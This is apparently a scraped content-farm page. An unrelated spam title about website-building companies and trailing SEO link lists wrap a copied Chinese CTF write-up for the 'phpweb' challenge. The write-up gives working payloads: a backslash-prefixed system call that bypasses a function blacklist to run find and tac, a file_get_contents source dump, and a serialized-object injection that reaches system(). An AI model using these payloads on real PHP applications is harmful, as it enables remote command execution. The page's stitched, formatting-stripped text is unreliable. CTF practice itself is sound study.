当前位置: 首页 > news >正文

铜陵网站建设公司wordpress美图插件

铜陵网站建设公司,wordpress美图插件,陕西省住建厅网站官网,apache多个网站BUU [网鼎杯 2020 朱雀组]phpweb 众生皆懒狗。打开题目#xff0c;只有一个报错#xff0c;不知何从下手。 翻译一下报错#xff0c;data()函数:,还是没有头绪#xff0c;中国有句古话说的好“遇事不决抓个包” 抓个包果然有东西#xff0c;仔细一看这不就分别是函数和参…BUU [网鼎杯 2020 朱雀组]phpweb 众生皆懒狗。打开题目只有一个报错不知何从下手。 翻译一下报错data()函数:,还是没有头绪中国有句古话说的好“遇事不决抓个包” 抓个包果然有东西仔细一看这不就分别是函数和参数吗试一下别的从报错发现和函数call_user_func()有关系。 试一下命令执行有过滤难办那还是得办。从这里开始分为两种方法了。 法一 绕过过滤 \system(ls); \system可以绕过黑名单的原因php内的 \ 在做代码执行的时候会识别特殊字符串。 Payload:func\systemptac $(find / -name fla*) 一步到位。 法二 利用file_get_contents获取index.php的源码 funcfile_get_contentspindex.php 源码如下 ?php$disable_fun array(exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg,assert,substr_replace,call_user_func_array,call_user_func,array_filter, array_walk, array_map,registregister_shutdown_function,register_tick_function,filter_var, filter_var_array, uasort, uksort, array_reduce,array_walk, array_walk_recursive,pcntl_exec,fopen,fwrite,file_put_contents);function gettime($func, $p) { ​ $result call_user_func($func, $p); ​ $a gettype($result); ​ if ($a string) { ​ return $result; ​ } else {return ;}}class Test { ​ var $p Y-m-d h:i:s a; ​ var $func date; ​ function __destruct() { ​ if ($this-func ! ) { ​ echo gettime($this-func, $this-p); ​ } ​ }}$func $_REQUEST[func];$p $_REQUEST[p];if ($func ! null) { ​ $func strtolower($func); ​ if (!in_array($func,$disable_fun)) { ​ echo gettime($func, $p); ​ }else { ​ die(Hacker...); ​ }}?妈呀过滤的真多麻了幸好没有去一个一个测试。 分析一下代码是存在反序列化漏洞的。我们可以传进去 f u n c u n s e r i a l i z e , funcunserialize, funcunserialize,p序列化后的字符串。可以序列化Text类其中var $p “tac $(find / -name fla*)”;var $func “system”;【注意这里的类里面的func和p与传进去的不一样不需要进行过滤】貌似反序列化的题经常喜欢拿名字一样的两个东西来混淆视听这个应该是考察我们对序列化和代码的理解能力。 构造exp Payload funcunserializepO%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A24%3A%22tac%24%28find%2F-namefla%2A%29%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D这里应该是可以不url编码直接传字符串的 也可以是Payload funcunserializepO:4:“Test”:2:{s:1:“p”;s:24:“tac $(find / -name fla*)”;s:4:“func”;s:6:“system”;} 补充法 好像也可以利用highlight_file或者show_source获取index.php的源码做法和法二一样。
http://wiki.neutronadmin.com/news/368430/

相关文章:

  • 企业网站的开发保险购买平台有哪些
  • 上海建设工程招投标在什么网站南宁建设网站哪里好
  • 高级网站开发技术无锡优化网站费用
  • 原材料价格查询网站企业域名如何申请
  • 域名访问过程会不会影响网站访问开发app费用
  • 网站建站麻烦吗百度最怕哪个部门去投诉
  • 太谷网站建设做调研的网站一般有哪些
  • 摄影网站导航wordpress导航菜单制作
  • .net 手机网站源码下载软件项目实施流程八个阶段
  • 企业公司网站制作网站建设详细
  • 网站制作哪些分类销售管理5大要素
  • 网站推广10大方法网站改版影响排名吗
  • 怎样营销网站爱站关键词挖掘
  • 昆山网站建设推广计算机应用技术好就业吗
  • 优设网网站设计评价自己怎么做网站卖东西
  • 云主机重装系统后网站重新部署吗wordpress 转发
  • 2016网站建设总结做视频网站源码
  • 网站不收录 域名问题成都网站推广 优帮云
  • 模板建站有什么优势网站开发人员工作内容
  • 做网站赚谁的钱ppt模板大全app
  • 网站后台 页面内容不显示做公众号用什么网站吗
  • 做付费软件网站网站空间哪家公司的好
  • 网站第三方评价如何做长沙做网站最好的公司
  • 苏州模板网站专业设计近的中医小程序定制
  • 开发区建设集团网站做网站买服务器大概多少钱
  • 部门子网站建设方案潍坊市建设信息网
  • 一般网站的前台功能模块视频网站怎么搭建
  • 赤峰网站建设贵阳网站制作 建设
  • 做网站现在可以挣钱吗买个网站域名要多少钱一年
  • 自己搭建个人网站的注意事项国家住房和城乡建设网站